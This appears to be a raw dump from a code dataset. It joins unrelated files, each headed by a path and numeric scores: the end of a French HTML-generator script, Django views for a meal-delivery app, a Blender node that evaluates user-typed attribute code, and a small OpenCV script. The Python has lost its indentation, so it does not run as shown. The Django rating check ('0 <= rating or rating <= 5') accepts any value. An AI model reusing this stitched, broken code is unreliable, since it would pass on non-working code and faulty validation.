Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br>
<a class="navButton" href="../exercices_corrections_pdf/" target="_blank"><span>voir les fichiers pdf</span></a>
<a class="navButton" href="../exercices_corrections_pdf_crop/" target="_blank"><span>voir les fichiers pdf ajustés</span></a>
<a class="navButton" href="../exercices_corrections_png/" target="_blank"><span>voir les fichiers png ajustés</span></a>
<br>
<a class="navButton" href="https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf" target="_blank"><span>compiler un fichier tex sur overleaf</span></a>
<a class="navButton" href="../tex_a_compiler/dnb_2013_04_pondichery_1.tex" target="_blank"><span>télécharger le fichier source tex </span></a>
</p>
<h3> License <a href="https://choosealicense.com/licenses/mit/" target="_blank">MIT</a><h3>
"""
])
# On ferme le body
indexHTML.writelines([
"""
</body>\n
</html>\n
"""
])
#On ferme le fichier
indexHTML.close()
if __name__ == "__main__":
main() | 2.765625 | 3 |
src/deliverer/views.py | OrenBen-Meir/Meal-Spot | 0 | 12794348 | from django.shortcuts import render, redirect, get_list_or_404, get_object_or_404
from database.models import user, restaurant, address
from helper import parse_req_body, userTypeChecker
import django.views
# Create your views here.
def home(request):
my_user = None
# makes sure user is deliverer
try:
my_user = request.user
userIs = userTypeChecker(my_user)
if userIs(user.Deliverer) != True:
response = redirect('home-nexus')
return response
except Exception as e:
print(e)
response = redirect('home-nexus')
return response
except:
response = redirect('home-nexus')
return response
my_deliverer = user.Deliverer.objects.get(user=my_user)
registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H'
if registered != True: # if not registered
return redirect('deliverer-register')
if request.method == "POST": # If bidded
body = parse_req_body(request.body)
amount = body['amount']
order_id = body['orderId']
order = restaurant.Order.objects.get(id=order_id)
new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order)
new_bid.save()
unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant)
pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False)
won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True)
open_orders = []
for order in unchosen_orders:
if len(pending_bids.filter(order=order)) == 0:
open_orders.append(order)
print(open_orders)
print(pending_bids)
print(won_bids)
context = {
'warnings': my_deliverer.warnings,
'openOrders': open_orders,
'pendingBids': pending_bids,
'winningBids': won_bids
}
return render(request, 'deliverer/home.html', context=context)
def register(request):
my_user = None
try:
my_user = request.user
isType = userTypeChecker(my_user)
if isType(user.Deliverer) != True:
response = redirect('home-nexus')
return response
except:
response = redirect('home-nexus')
return response
my_deliverer = user.Deliverer.objects.get(user=my_user)
registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H'
if registered:
return redirect('deliverer-home')
registering = my_deliverer.restaurant == None and my_deliverer.status != 'H'
restaurants = restaurant.Restaurant.objects.all()
context={'restaurants': restaurants, 'registering': registering}
if request.method == "POST":
body = parse_req_body(request.body)
resturant_id = int(body['id'])
reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id)
my_deliverer.restaurant = reg_resturant
my_deliverer.save()
context['registering'] = False
return render(request, 'deliverer/register.html', context=context)
def order(request, pk):
my_user = request.user
order = get_object_or_404(restaurant.Order, pk=pk)
customer = order.customer
customer_address = address.CustomerAddress.objects.get(customer=customer)
my_resturant = user.Deliverer.objects.get(user=my_user).restaurant
restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant)
if(request.method == "POST"):
body = parse_req_body(request.body)
rating = int(body['rating'])
if 0 <= rating or rating <= 5:
order.status = 'D'
order.customer_rating = rating
try:
customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant)
except:
customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N')
customer_status.save()
customer_status.update_status(rating)
order.save()
rating = order.delivery_rating
return render(request, 'deliverer/order.html', context={
'order': order,
'customerAddress': customer_address,
'restaurantAddress': restaurant_address
}) | 2.09375 | 2 |
scripts/addons/animation_nodes/nodes/object/object_attribute_input.py | Tilapiatsu/blender-custom_conf | 2 | 12794349 | <reponame>Tilapiatsu/blender-custom_conf
import bpy
from bpy.props import *
from ... utils.code import isCodeValid
from ... events import executionCodeChanged
from ... base_types import AnimationNode
class ObjectAttributeInputNode(bpy.types.Node, AnimationNode):
bl_idname = "an_ObjectAttributeInputNode"
bl_label = "Object Attribute Input"
bl_width_default = 160
errorHandlingType = "MESSAGE"
attribute: StringProperty(name = "Attribute", default = "",
update = executionCodeChanged)
def create(self):
self.newInput("Object", "Object", "object", defaultDrawType = "PROPERTY_ONLY")
self.newOutput("Generic", "Value", "value")
def draw(self, layout):
layout.prop(self, "attribute", text = "")
def drawAdvanced(self, layout):
self.invokeFunction(layout, "createAutoExecutionTrigger", text = "Create Execution Trigger")
def getExecutionCode(self, required):
code = self.evaluationExpression
if not isCodeValid(code):
yield "self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip()) > 0)"
yield "value = None"
return
yield "try:"
yield " " + code
yield "except:"
yield " if object: self.setErrorMessage('Attribute not found')"
yield " value = None"
@property
def evaluationExpression(self):
if self.attribute.startswith("["): return "value = object" + self.attribute
else: return "value = object." + self.attribute
def createAutoExecutionTrigger(self):
item = self.nodeTree.autoExecution.customTriggers.new("MONITOR_PROPERTY")
item.idType = "OBJECT"
item.dataPath = self.attribute
item.object = self.inputs["Object"].object
| 2 | 2 |
opencv/commercial/Instructions/OpenCV_Basics/image/image.py | SSG-DRD-IOT/commercial-iot-security-system | 0 | 12794350 | <gh_stars>0
import cv2
img = cv2.imread( 'image.jpg' )
cv2.imshow( "Image", img )
cv2.waitKey( 0 )
cv2.imwrite( "new_image.jpg", img )
cv2.destroyAllWindows()
| 2.78125 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.